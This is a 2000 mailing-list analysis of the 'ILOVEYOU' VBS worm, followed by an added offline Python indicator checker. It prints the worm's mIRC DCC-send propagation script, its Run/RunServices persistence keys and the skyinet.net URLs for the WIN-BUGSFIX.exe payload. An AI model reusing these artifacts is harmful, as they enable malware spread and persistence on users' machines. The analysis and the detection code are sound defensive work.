
[OT] VBS Script Summary (I love you)



Put together by Morgan Sarges, one of our engineers.

Regards,

-- 
Nathan Norman         "Eschew Obfuscation"          Network Engineer
GPG Key ID 1024D/51F98BB7            http://home.midco.net/~nnorman/
Key fingerprint = C5F4 A147 416C E0BF AB73  8BEF F0C8 255C 51F9 8BB7
Virus Summary:

Date: May 3, 2000, 8:20am

This script works as listed below:

It has 5 subroutines:
regruns, html, spreadtoemail, listadriv, regruns


First up some registry keys are created:
HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout
HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout 0

	These are associated with Windows Scripting Host.

Then, the following file copies occur:

	MSKernel32.vbs, Win32DLL.vbs, LOVE-LETTER-FOR-YOU.TXT.vbs

	These files are copied to wherever the Windows Scripting Host files
	live.  (I haven't worked with Windows Scripting Host.)

Next, the following registry keys are created:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory

Next, the following is run:
	Randomize
	num = Int((4 * Rnd) + 1)

	Which is a random number generator that cranks out a number between
	1 and 4, inclusive.

An if-else block executes, based on the number generated, and points the user's
machine (via Internet Explorer) to one of the following URLs:

The URLs below also have registry keys created; the keys are listed
with their respective URLs:

http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe
HKCU\Software\Microsoft\Internet Explorer\Main\Start Page

http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe
HKCU\Software\Microsoft\Internet Explorer\Main\Start Page

http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe
HKCU\Software\Microsoft\Internet Explorer\Main\Start Page

http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe
HKCU\Software\Microsoft\Internet Explorer\Main\Start Page

If this file (WIN-BUGSFIX.exe) has already been pulled, the following
registry key is created:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank

(The end result is at this point, IE will start up with blank.htm)

Now, a list of drives is created, and all drives are scanned in the following
manner:

	Any files with .vbs or .vbe extensions (visual basic scripts or exes)
		are written to a list (flat text file)
	Any files with .js .jse .css .wsh .sct .hta 
		are written to another list
	Any files with .jpg .jpeg .mp2 .mp3 extensions are written to another
		list.

Next, the infected system is searched for mirc32.exe, and if it is on the
system, an IRC script is created, so that the next time mIRC is run,
when the IRC server is contacted, the script will DCC send the 3rd file list
(with JPEGs and MP3s) to a channel, which listens for these lists.

	The contents of the mIRC script are below, in a file called script.ini
		inside the mIRC directory tree:

	Please dont edit this script... mIRC will corrupt, if mIRC will
	corrupt... WINDOWS will affect and will not run correctly. thanks
	;
	;Khaled Mardam-Bey
	;http://www.mirc.com
	;
	n0=on 1:JOIN:#:{
	n1=  /if ( $nick == $me ) { halt }
	n2=  /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM
	n3=}

Now, another directory search is run based on the 3 file lists built.
Files and folders meeting the criteria above are tagged as infected.

Next, the email propagation begins.  Any program that can make use
of the following registry keys will be checked for address books:

HKEY_CURRENT_USER\Software\Microsoft\WAB\

A temporary address list is created, with a counter.
The new email message is formatted, the attachment is hooked up,
and the email is dumped to a server.

Once this occurs, the following registry keys are written:
HKEY_CURRENT_USER\Software\Microsoft\WAB\
	under this key, there will be a DWORD with a value of 1,
	and an address entry count

If a user gets to messing with the attachment, the attachment will
ask the user to click on a button to enable ActiveX controls.

If this is successful, the files copied initially, MSKernel32.vbs
may be run.

This is by no means a complete summary.

I'll try to send more info as I dig into the EXEs that are pulled
from the web URLs listed above.

Morgan

Attachment: pgp6yrYzAYPYF.pgp
Description: PGP signature
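An added indicator check built from the artifacts the summary above lists (this is editor-added example code, not Morgan's or Nathan's, and not the worm's own script). It runs offline over a constructed snapshot of registry values, file paths and a script.ini: the WSH Settings\Timeout value of 0, the three dropped .vbs copies, the Run/RunServices autostart entries, an IE Start Page pointing at one of the skyinet.net WIN-BUGSFIX.exe URLs, and the DCC send line in mIRC's script.ini. The snapshot dictionary layout, the sample paths (C:\WINDOWS, C:\WINDOWS\SYSTEM) and the function names are assumptions made for the example; "about:blank" on its own is deliberately not flagged, since the summary shows it only as the post-download state and it is a common legitimate setting.

```python
import re

# Registry locations named in the summary (HKLM/HKCU abbreviations as in the post).
RUN_KEY = r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
RUNSERVICES_KEY = r"HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"
WSH_SETTINGS = r"HKCU\Software\Microsoft\Windows Scripting Host\Settings"
IE_MAIN = r"HKCU\Software\Microsoft\Internet Explorer\Main"

# Autostart value -> base name of the file the summary says it points at.
AUTOSTART_VALUES = {
    (RUN_KEY, "MSKernel32"): "mskernel32.vbs",
    (RUNSERVICES_KEY, "Win32DLL"): "win32dll.vbs",
    (RUN_KEY, "WIN-BUGSFIX"): "win-bugsfix.exe",
}
# Copies the script drops, matched case-insensitively on base name.
DROPPED_FILES = {"mskernel32.vbs", "win32dll.vbs", "love-letter-for-you.txt.vbs"}
# Start Page set to one of the skyinet.net download URLs ("about:blank" alone is not flagged).
START_PAGE_RE = re.compile(r"^http://www\.skyinet\.net/~\w+/[^/\s]+/WIN-BUGSFIX\.exe$", re.I)
# The DCC send line written into mIRC's script.ini.
DCC_LINE_RE = re.compile(r"dcc\s+send\s+\$nick\s+.*LOVE-LETTER-FOR-YOU\.HTM", re.I)


def _basename(path):
    """Lowercased base name of a Windows path (works on any host OS)."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def check_registry(registry):
    """registry: {key_path: {value_name: data}} -> list of finding strings."""
    findings = []
    timeout = registry.get(WSH_SETTINGS, {}).get("Timeout")
    if timeout is not None and str(timeout) == "0":
        findings.append("WSH Settings\\Timeout = 0 (no script time limit)")
    for (key, name), expected in AUTOSTART_VALUES.items():
        data = str(registry.get(key, {}).get(name, ""))
        if _basename(data) == expected:
            findings.append(f"autostart {key}\\{name} -> {data}")
    start_page = str(registry.get(IE_MAIN, {}).get("Start Page", ""))
    if START_PAGE_RE.match(start_page):
        findings.append(f"IE Start Page set to WIN-BUGSFIX.exe download: {start_page}")
    return findings


def check_files(paths):
    """paths: iterable of file paths -> findings for dropped worm copies."""
    return [f"dropped file {p}" for p in paths if _basename(p) in DROPPED_FILES]


def check_mirc_script(script_ini_text):
    """script_ini_text: contents of mIRC's script.ini (or None) -> findings."""
    if not script_ini_text:
        return []
    return [f"mIRC script.ini DCC line: {line.strip()}"
            for line in script_ini_text.splitlines() if DCC_LINE_RE.search(line)]


def scan(registry, paths, script_ini_text=None):
    """Run all three checks; an empty list means none of the listed indicators was seen."""
    return check_registry(registry) + check_files(paths) + check_mirc_script(script_ini_text)


# Constructed snapshot of a hypothetical infected host (assumed paths, not captured data).
SAMPLE_REGISTRY = {
    WSH_SETTINGS: {"Timeout": 0},
    RUN_KEY: {"MSKernel32": r"C:\WINDOWS\SYSTEM\MSKernel32.vbs",
              "WIN-BUGSFIX": r"C:\WINDOWS\Desktop\WIN-BUGSFIX.exe"},
    RUNSERVICES_KEY: {"Win32DLL": r"C:\WINDOWS\Win32DLL.vbs"},
    IE_MAIN: {"Start Page": "http://www.skyinet.net/~young1s/"
              "HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"},
}
SAMPLE_FILES = [
    r"C:\WINDOWS\SYSTEM\MSKernel32.vbs",
    r"C:\WINDOWS\Win32DLL.vbs",
    r"C:\WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.TXT.vbs",
    r"C:\WINDOWS\notepad.exe",
]
SAMPLE_SCRIPT_INI = r"""n0=on 1:JOIN:#:{
n1=  /if ( $nick == $me ) { halt }
n2=  /.dcc send $nick "C:\WINDOWS\SYSTEM"\LOVE-LETTER-FOR-YOU.HTM
n3=}
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_REGISTRY, SAMPLE_FILES, SAMPLE_SCRIPT_INI):
        print(finding)
```

On a real host the registry dictionary would be filled from a reg export and the path list from a drive walk; the checks themselves only look at the artifacts the summary names, so a box that was cleaned of the autostart entries but still carries the script.ini DCC line is still reported.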